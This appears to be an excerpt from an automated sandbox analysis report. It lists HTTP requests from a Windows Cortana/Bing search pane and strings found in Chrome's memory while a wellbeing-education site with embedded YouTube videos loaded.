Source: global traffic HTTP traffic detected: GET /rp/BaYvmXn0q_Cf4wTJN2K9KdBrfbQ.js HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=4590362BB5CF472B95BBEDB3112D4B7B; _SS=SID=19FF0D34A8246FAD33EA189CA9E56EAD&CBV=54277149&CPID=1741339336683&AC=1&CPH=01beaa36; _EDGE_S=SID=128F177EAEC96EC83CF802D6AFDF6F95&mkt=de-ch; SRCHUID=V=2&GUID=79A4A21CD5314D11975C5022FA7E18FB&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=c1a41935&IPMID=1741339336683&SRCHLANG=de&LUT=1741339335365; CortanaAppUID=99325A50A46066F842A6B684698F464A; MUIDB=4590362BB5CF472B95BBEDB3112D4B7B
Source: global traffic HTTP traffic detected: GET /rp/BjLNboZeAl9CUzulz_BWYtAs2KI.js HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=4590362BB5CF472B95BBEDB3112D4B7B; _SS=SID=19FF0D34A8246FAD33EA189CA9E56EAD&CBV=54277149&CPID=1741339336683&AC=1&CPH=01beaa36; _EDGE_S=SID=128F177EAEC96EC83CF802D6AFDF6F95&mkt=de-ch; SRCHUID=V=2&GUID=79A4A21CD5314D11975C5022FA7E18FB&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=c1a41935&IPMID=1741339336683&SRCHLANG=de&LUT=1741339335365; CortanaAppUID=99325A50A46066F842A6B684698F464A; MUIDB=4590362BB5CF472B95BBEDB3112D4B7B
Source: global traffic HTTP traffic detected: GET /AS/API/WindowsCortanaPane/V2/Suggestions?qry=o&setlang=en-CH&cc=CH&nohs=1&qfm=1&cp=1&cvid=eb82c8e7c31b4b76bd657e149bcf58ff&ig=65dc22f5bae44905b431c10cc183a3ed HTTP/1.1host: www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: */*accept-language: en-CHx-agent-deviceid: 01000A41090080B6x-bm-cbt: 1747926312x-bm-clientfeatures: FontV22,LightAnswers,PreviewPaneAvailable,RevStorex-bm-dateformat: dd/MM/yyyyx-bm-devicedimensions: 784x640x-bm-devicedimensionslogical: 784x640x-bm-devicescale: 100x-bm-dtz: -240x-bm-market: CHx-bm-theme: 000000;0078d7x-bm-windowsflights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66Ex-device-clientsession: 545012EC6AF64F449D402DDDF0620E33x-device-isoptin: falsex-device-machineid: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}x-device-ossku: 48x-device-touch: falsex-deviceid: 01000A41090080B6x-msedge-externalexp: d-thshld42,d-thshld78,d-thshldspcl40,padtmpmsgc,psdupt,sappcsfixt,wsbref-cx-msedge-externalexptype: JointCoordx-positionertype: Desktopx-search-appid: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIx-search-cortanaavailablecapabilities: Nonex
Source: global traffic HTTP traffic detected: GET /apc/trans.gif?b4b2360df62e9cf0666e60a982b91b70 HTTP/1.1host: l-ring.msedge.netreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: image/png,image/svg+xml,image/*;q=0.8,*/*;q=0.5accept-language: en-CHaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
Source: global traffic HTTP traffic detected: GET /AS/API/WindowsCortanaPane/V2/Suggestions?qry=on&setlang=en-CH&cc=CH&nohs=1&qfm=1&cp=2&cvid=eb82c8e7c31b4b76bd657e149bcf58ff&ig=0638cfbb5a9041079ce3b71fd1168ee9 HTTP/1.1host: www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: */*accept-language: en-CHx-agent-deviceid: 01000A41090080B6x-bm-cbt: 1747926312x-bm-clientfeatures: FontV22,LightAnswers,PreviewPaneAvailable,RevStorex-bm-dateformat: dd/MM/yyyyx-bm-devicedimensions: 784x640x-bm-devicedimensionslogical: 784x640x-bm-devicescale: 100x-bm-dtz: -240x-bm-market: CHx-bm-theme: 000000;0078d7x-bm-windowsflights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66Ex-device-clientsession: 545012EC6AF64F449D402DDDF0620E33x-device-isoptin: falsex-device-machineid: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}x-device-ossku: 48x-device-touch: falsex-deviceid: 01000A41090080B6x-msedge-externalexp: d-thshld42,d-thshld78,d-thshldspcl40,padtmpmsgc,psdupt,sappcsfixt,wsbref-cx-msedge-externalexptype: JointCoordx-positionertype: Desktopx-search-appid: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIx-search-cortanaavailablecapabilities: None
Source: global traffic HTTP traffic detected: GET /rp/Cj3ZU8zX_sufjrVdLFel-pJdQTs.js HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=4590362BB5CF472B95BBEDB3112D4B7B; _SS=SID=19FF0D34A8246FAD33EA189CA9E56EAD&CBV=54277149&CPID=1741339336683&AC=1&CPH=01beaa36; _EDGE_S=SID=128F177EAEC96EC83CF802D6AFDF6F95&mkt=de-ch; SRCHUID=V=2&GUID=79A4A21CD5314D11975C5022FA7E18FB&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=c1a41935&IPMID=1741339336683&SRCHLANG=de&LUT=1741339335365; CortanaAppUID=99325A50A46066F842A6B684698F464A; MUIDB=4590362BB5CF472B95BBEDB3112D4B7B
Source: global traffic HTTP traffic detected: GET /apc/trans.gif?64d45b2e0b5acbfe07e333093de52a06 HTTP/1.1host: l-ring.msedge.netreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: image/png,image/svg+xml,image/*;q=0.8,*/*;q=0.5accept-language: en-CHaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
Source: global traffic HTTP traffic detected: GET /rp/Dn5Iypmm_cLV_tG2zZt_ZqSWy5o.js HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=4590362BB5CF472B95BBEDB3112D4B7B; _SS=SID=19FF0D34A8246FAD33EA189CA9E56EAD&CBV=54277149&CPID=1741339336683&AC=1&CPH=01beaa36; _EDGE_S=SID=128F177EAEC96EC83CF802D6AFDF6F95&mkt=de-ch; SRCHUID=V=2&GUID=79A4A21CD5314D11975C5022FA7E18FB&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=c1a41935&IPMID=1741339336683&SRCHLANG=de&LUT=1741339335365; CortanaAppUID=99325A50A46066F842A6B684698F464A; MUIDB=4590362BB5CF472B95BBEDB3112D4B7B
Source: chrome.exe, 00000000.00000003.2377647837.000028EC053D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2377606221.000028EC053C0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: text/html,$Science of THRIVE Approach - YouTubeE=https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2355407453.000028EC03A7C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2355372012.000028EC053D0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: text/html,$Welcome to Thrive Learning - YouTubeE=https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2400466181.000028EC07EC1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: Approach to Wellbeing</p><p class=\"tlc-video-iframe\"><iframe width=\"560\" height=\"315\" src=\"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR\" title=\"YouTube video player\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share\" allowfullscreen=\"\"></iframe></p></div><div class=\"tlc-videos2\"><p>How can you tap into your own Fountain of Health? Watch below:</p><p class=\"tlc-video-iframe\"><iframe width=\"560\" height=\"315\" src=\"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX\" title=\"YouTube video player\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share\" allowfullscreen=\"\"></iframe></p></div><div class=\"tlc-videos3\"><p><span><strong>Dr. John Chiasson </strong></span>shares evidence and Thrive Learning Centre resources.</p><p class=\"tlc-video-iframe\"><iframe width=\"560\" height=\"315\" src=\"https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws\" title=\"YouTube video player\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share\" allowfullscreen=\"\"></iframe></p></div></div></div></div>\n \n </section>\n\n<section class=\"block block-block-content block-block-contentf966ba8c-fc24-474a-8805-f39f333363d9 clearfix\">\n \n \n\n \n <div class=\"field field--name-body field--type-text-with-summary field--label-hidden field--item\"><div class=\"thrive-apprpach-img\"><p><img src=\"/sites/default/files/inline-images/leaves-banner-2_0_0.jpg\" data-entity-uuid=\"863dde25-bef3-486b-910c-2ecf2d16be0f\" data-entity-type=\"file\" width=\"2185\" height=\"305\"></p></div><div class=\"container tlc-wellbeing\"><div><div class=\"tlc-wellbeing-b2\"><h4>What is the THRIVE equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: HPX*"https://www.facebook.com/FOHThrive equals www.facebook.com (Facebook)
Source: chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: PX`5-https://www.youtube.com/@fountainofhealth2679 equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2489590171.000028EC03E8C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: ","currentUrl":"https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2489590171.000028EC03E8C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: ","currentUrl":"https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws","inline":true,"dynamic":false}e} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2495865997.000028EC04894000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: ","currentUrl":"https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws","inline":true,"dynamic":true} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2393613989.000028EC04B35000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: ",\"DOMAIN_ADMIN_STATE\":\"\"});window.ytcfg.obfuscatedData_ = [];","currentUrl":"https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2352226880.000028EC041A5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: ",\"DOMAIN_ADMIN_STATE\":\"\"});window.ytcfg.obfuscatedData_ = [];","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2331553095.000028EC08604000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331869363.000028EC05804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331543436.000028EC08204000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "auth"||B.details.rc!=="429"?B.errorCode==="ump.spsrejectfailure"&&(h="HTML5_SPS_UMP_STATUS_REJECTED"):(h="TOO_MANY_REQUESTS",W="6");this.iO.jD(B.errorCode,B.severity,h,Q_(B.details),W)}else this.iO.publish("nonfatalerror",B),R=/^pp/.test(this.videoData.clientPlaybackNonce),this.h0(B.errorCode,B.details),R&&B.errorCode==="manifest.net.connect"&&(B="https://www.youtube.com/generate_204?cpn="+this.videoData.clientPlaybackNonce+"&t="+(0,g.f)(),MP(B,"manifest",function(b){z.X=!0;z.OE("pathprobe",b)}, equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2482855525.000028EC03537000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: "clientName\":\"WEB_EMBEDDED_PLAYER\",\"clientVersion\":\"1.20250519.22.00\",\"osName\":\"Windows\",\"osVersion\":\"10.0\",\"originalUrl\":\"https://www.youtube.com/embed/h15NcT6UXh0?si\\u003dYrXkudamh5IoggTR\",\"platform\":\"DESKTOP\",\"clientFormFactor\":\"UNKNOWN_FORM_FACTOR\",\"configInfo\":{\"appInstallData\":\"CPb6vMEGEODg_xIQgc3OHBCIhLgiEIeszhwQ2oeAExDM364FEOugzxwQvoqwBRCvj_8SEN68zhwQ3ZbPHBD8ss4cEP7z_xIQpp3PHBDT4a8FEIjjrwUQ3KLPHBDhns8cEP2czxwQ5qDPHBDMic8cEL2ZsAUQ37jOHBC52c4cEParsAUQvbauBRCZjbEFEO2gzxwQ8OLOHBDJ968FEOvo_hIQmZixBRCcm88cEPGcsAUQyeawBRC72c4cEJr0zhwQsInPHBDXnM8cEOqjzxwQuOTOHBCe0LAFEIOEuCIQ9v7_EhCJsM4cEP6ezxwQk4bPHBDk5_8SELfq_hIQiIewBRCLgoATEJT-sAUqKENBTVNHQlVULVpxLURKU0NFdmVwMlF2bW9RajU3QVBKM0FVZEJ3PT0%3D\"},\"browserName\":\"Chrome\",\"browserVersion\":\"134.0.0.0\",\"acceptHeader\":\"text/html,application/xhtml+xml,application/xml;q\\u003d0.9,image/avif,image/webp,image/apng,*/*;q\\u003d0.8,application/signed-exchange;v\\u003db3;q\\u003d0.7\",\"deviceExperimentId\":\"ChxOelV3TnpJNE5qWTRNVFF6TkRNMk9ESTVOUT09EPb6vMEGGPb6vMEG\",\"rolloutToken\":\"CLLHipfu3syhbhCrlubnrLeNAxi57PGcrbeNAw%3D%3D\"},\"user\":{\"lockedSafetyMode\":false},\"request\":{\"useSsl\":true},\"clickTracking\":{\"clickTrackingParams\":\"IhMI9d/xnK23jQMVIU5MCB1T1y6N\"},\"thirdParty\":{\"embeddedPlayerContext\":{\"embeddedPlayerEncryptedContext\":\"AD5ZzFTPLYxSer_R5PwkmZS-Tw4kib1_UG_YuM7PzprIn7h7HloFiT40fhwHmvTcbDZ5mAmX_gi3mQS0IvX9cIfuaL02Wqj7eTV8PMLoUpzaX-xPKwhnTeP7PCHG7qXu9THt\",\"ancestorOriginsSupported\":false}}},\"INNERTUBE_CONTEXT_CLIENT_NAME\":56,\"INNERTUBE_CONTEXT_CLIENT_VERSION\":\"1.20250519.22.00\",\"INNERTUBE_CONTEXT_GL\":\"US\",\"INNERTUBE_CONTEXT_HL\":\"en\",\"LATEST_ECATCHER_SERVICE_TRACKING_PARAMS\":{\"client.name\":\"WEB_EMBEDDED_PLAYER\"},\"LOGGED_IN\":false,\"PAGE_BUILD_LABEL\":\"youtube.player.web_20250519_22_RC00\",\"PAGE_CL\":760609635,\"SERVER_NAME\":\"WebFE\",\"VISITOR_DATA\":\"CgtZeUJvRVhYZXBCMCj2-rzBBjIKCgJVUxIEGgAgUA%3D%3D\",\"WEB_PLAYER_CONTEXT_CONFIGS\":{\"WEB_PLAYER_CONTEXT_CONFIG_ID_EMBEDDED_PLAYER\":{\"rootElementId\":\"movie_player\",\"jsUrl\":\"/s/player/59b252b9/player_ias.vflset/en_US/base.js\",\"cssUrl\":\"/s/player/59b252b9/www-player.css\",\"contextId\":\"WEB_PLAYER_CONTEXT_CONFIG_ID_EMBEDDED_PLAYER\",\"eventLabel\":\"embedded\",\"contentRegion\":\"US\",\"hl\":\"en_US\",\"hostLanguage\":\"en\",\"innertubeApiKey\":\"AIzaSyAO_FJ2SlqU8Q4STEHLGCilw_Y9_11qcW8\",\"innertubeApiVersion\":\"v1\",\"innertubeContextClientVersion\":\"1.20250519.22.00\",\"device\":{\"brand\":\"\",\"model\":\"\",\"browser\":\"Chrome\",\"browserVersion\":\"134.0.0.0\",\"os\":\"Windows\",\"osVersion\":\"10.0\",\"platform\":\"DESKTOP\",\"interfaceName\":\"WEB_EMBEDDED_PLAYER\",\"interfaceVersion\":\"1.20250519.22.00\"},\"serializedExperimentIds\":\"24004644,24439361,24499532,24566687,51010235,51063643,51098299,51176511,51204329,51222973,51237842,51313767,51340662,51349914,51353393,51354083,51366423,51375647,51389629,51397332,51404808,51404810,51410964,51411
Source: chrome.exe, 00000000.00000002.2495865997.000028EC04894000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: "currentUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":fal equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2474881324.000028EC02C04000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: %https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2331553095.000028EC08604000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331869363.000028EC05804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331543436.000028EC08204000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 'use strict';var Y='prototype;scheme;push;slice;startsWith;W;Hm6v;split;;length;get;U;=;rr;join;/api/manifest;/initplayback;T;indexOf;set;clone;fvip;path;sp;ug;Untrusted URL;file;Y;fallback_count;toString;match;s;url;signatureCipher;else;youtube.player.web_20250519_22_RC00;n;cmo=;reverse;,(,}/";Tx;/;Pu;local;http://local;smRLl34tByYhJ4B--H-_w8_;fromCharCode;splice;kO;mn;&;unshift;assign;forEach;---;pow;1970-01-01T01:32:36.000+01:30;/videoplayback;pop;ql;https://local;/file/index.m3u8;://;:;index.m3u8;1969-12-31T15:45:03.000-08:15;Nt;r;//;?;1970-01-01T02:45:02.000+02:45;cmo=td;1;www.youtube.com;%3D;1969-12-31T20:15:16.000-03:45;1969-12-31T20:00:04.000-04:00;rr?[1-9].*\\.c\\.youtube\\.com$;replace;,;\\.a1\\.googlevideo\\.com$;playerfallback;cmo=pf;1969-12-31T17:30:53.000-06:30;\\.googlevideo\\.com$;nG;redirector.googlevideo.com;cmo;\u2267/;a1.googlevideo.com;undefined'.split(";"), equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2492640929.000028EC04120000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: ( _keyhttps://www.youtube.com/s/player/59b252b9/player_ias.vflset/en_US/embed.js equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2439355514.000001E4ACC00000.00000004.00000001.00040000.00000007.sdmp String found in binary or memory: ( http://localhost:64111/tabstatus//www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2495865997.000028EC04894000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: ("currentUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":fal equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2496237915.000028EC0490C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: (42783B83FBBChttps://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2302567636.000028EC04908000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: (essageHandlerhttps://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2485632326.000028EC0380C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: (f/embedfdomainowww.youtube.com equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2490662725.000028EC03FB4000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: (https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX" equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2487287792.000028EC03B44000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: (stAnimationFrame(functin(){slt(el,0)});else slt(el,16)}})(window,document);\n","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2492215314.000028EC040DC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: (te Array.prototype.entries;}","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":true} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2495235628.000028EC047BC000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2377119871.000028EC03B70000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2487353472.000028EC03B73000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: (www.youtube.com equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2370314019.000028EC062A1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: +xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIGVuYWJsZS1iYWNrZ3JvdW5kPSJuZXcgMCAwIDI0IDI0IiBoZWlnaHQ9IjI0IiB2aWV3Qm94PSIwIDAgMjQgMjQiIHdpZHRoPSIyNCIgZmlsbD0iI2ZmZiI+PGc+PHBhdGggZD0iTTE2LjI0LDkuMTdMMTMuNDEsMTJsMi44MywyLjgzbC0xLjQxLDEuNDFMMTIsMTMuNDFsLTIuODMsMi44M2wtMS40MS0xLjQxTDEwLjU5LDEyTDcuNzYsOS4xN2wxLjQxLTEuNDFMMTIsMTAuNTkgbDIuODMtMi44M0wxNi4yNCw5LjE3eiBNNC45Myw0LjkzYy0zLjkxLDMuOTEtMy45MSwxMC4yNCwwLDE0LjE0YzMuOTEsMy45MSwxMC4yNCwzLjkxLDE0LjE0LDBjMy45MS0zLjkxLDMuOTEtMTAuMjQsMC0xNC4xNCBDMTUuMTcsMS4wMiw4LjgzLDEuMDIsNC45Myw0LjkzeiBNMTguMzYsNS42NGMzLjUxLDMuNTEsMy41MSw5LjIyLDAsMTIuNzNzLTkuMjIsMy41MS0xMi43Mywwcy0zLjUxLTkuMjIsMC0xMi43MyBDOS4xNSwyLjEzLDE0Ljg1LDIuMTMsMTguMzYsNS42NHoiIC8+PC9nPjwvc3ZnPg==","https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX|data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAADCCAYAAACIaaiTAAAAAXNSR0IArs4c6QAAARJJREFUOE9lyNdHBQAAhfHb3nvvuu2997jNe29TJJEkkkgSSSSJJJJEEkkiifRH5jsP56Xz8PM5gcC/xfCIWBNHiXiTQIlEk0SJZJNCiVRIM+mUyDCZlMgy2ZTIMbmUyDP5lCgwhZQoMsWUKDGllCgz5ZSogEpTRYlqU0OJoKmlRJ2pp0SDaaREk2mmRItppUSbaadEh+mkRBd0mx5K9Jo+SvSbAUoMmiFKDJsRSoyaMUqMmwlKhMwkJabMNCVmYNbMUSJsIpSImnlKLJhFSiyZZWoFVmEN1mEDNmELtmEHdmEP9uEADuEIjuEETuEMzuECLuEKruEGbuEO7uEBHuEJnuEFXuEN3uEDPuELvuEHfv8AoRErEi7Uc8UAAAAASUVORK5CYII="],"notVisible":false,"pdfViewerLoaded":false,"hasInputFields":false} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2370314019.000028EC062A1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: +xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIGVuYWJsZS1iYWNrZ3JvdW5kPSJuZXcgMCAwIDI0IDI0IiBoZWlnaHQ9IjI0IiB2aWV3Qm94PSIwIDAgMjQgMjQiIHdpZHRoPSIyNCIgZmlsbD0iI2ZmZiI+PGc+PHBhdGggZD0iTTE2LjI0LDkuMTdMMTMuNDEsMTJsMi44MywyLjgzbC0xLjQxLDEuNDFMMTIsMTMuNDFsLTIuODMsMi44M2wtMS40MS0xLjQxTDEwLjU5LDEyTDcuNzYsOS4xN2wxLjQxLTEuNDFMMTIsMTAuNTkgbDIuODMtMi44M0wxNi4yNCw5LjE3eiBNNC45Myw0LjkzYy0zLjkxLDMuOTEtMy45MSwxMC4yNCwwLDE0LjE0YzMuOTEsMy45MSwxMC4yNCwzLjkxLDE0LjE0LDBjMy45MS0zLjkxLDMuOTEtMTAuMjQsMC0xNC4xNCBDMTUuMTcsMS4wMiw4LjgzLDEuMDIsNC45Myw0LjkzeiBNMTguMzYsNS42NGMzLjUxLDMuNTEsMy41MSw5LjIyLDAsMTIuNzNzLTkuMjIsMy41MS0xMi43Mywwcy0zLjUxLTkuMjIsMC0xMi43MyBDOS4xNSwyLjEzLDE0Ljg1LDIuMTMsMTguMzYsNS42NHoiIC8+PC9nPjwvc3ZnPg==","https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX|data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAADCCAYAAACIaaiTAAAAAXNSR0IArs4c6QAAARJJREFUOE9lyNdHBQAAhfHb3nvvuu2997jNe29TJJEkkkgSSSSJJJJEEkkiifRH5jsP56Xz8PM5gcC/xfCIWBNHiXiTQIlEk0SJZJNCiVRIM+mUyDCZlMgy2ZTIMbmUyDP5lCgwhZQoMsWUKDGllCgz5ZSogEpTRYlqU0OJoKmlRJ2pp0SDaaREk2mmRItppUSbaadEh+mkRBd0mx5K9Jo+SvSbAUoMmiFKDJsRSoyaMUqMmwlKhMwkJabMNCVmYNbMUSJsIpSImnlKLJhFSiyZZWoFVmEN1mEDNmELtmEHdmEP9uEADuEIjuEETuEMzuECLuEKruEGbuEO7uEBHuEJnuEFXuEN3uEDPuELvuEHfv8AoRErEi7Uc8UAAAAASUVORK5CYII="],"notVisible":false,"pdfViewerLoaded":false,"hasInputFields":false}uEN3uEDPuELvuEHfv8AoRErEi7Uc8UAAAAASUVORK5CYII="],"notVisible":false,"pdfViewerLoaded":false,"hasInputFields":false} equals www.youtube.com (Youtube)
